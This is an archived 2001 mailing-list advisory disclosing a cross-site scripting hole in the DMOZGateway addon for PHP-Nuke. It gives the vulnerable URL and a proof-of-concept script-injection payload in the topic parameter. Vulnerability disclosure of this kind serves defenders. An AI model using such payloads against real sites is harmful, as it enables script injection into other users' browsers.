('binary' encoding is not supported, stored as-is) New hole in an phpnuke addon. The concerned addon is DMOZGateway. He allows to search on the web via the dmoz.org site. The addon's url is th following one : /modules.php? op=modload&name=DMOZGateway&file=index The cross site scripting hole is : /modules.php? op=modload&name=DMOZGateway&file=index&topic =<sc*ript>alert(document.domain) </sc*ript><sc*ript>alert(/test/)</sc*ript> (without the '*') frog-m@n
This archive was generated by hypermail 2b30 : Sun Dec 16 2001 - 10:03:42 PST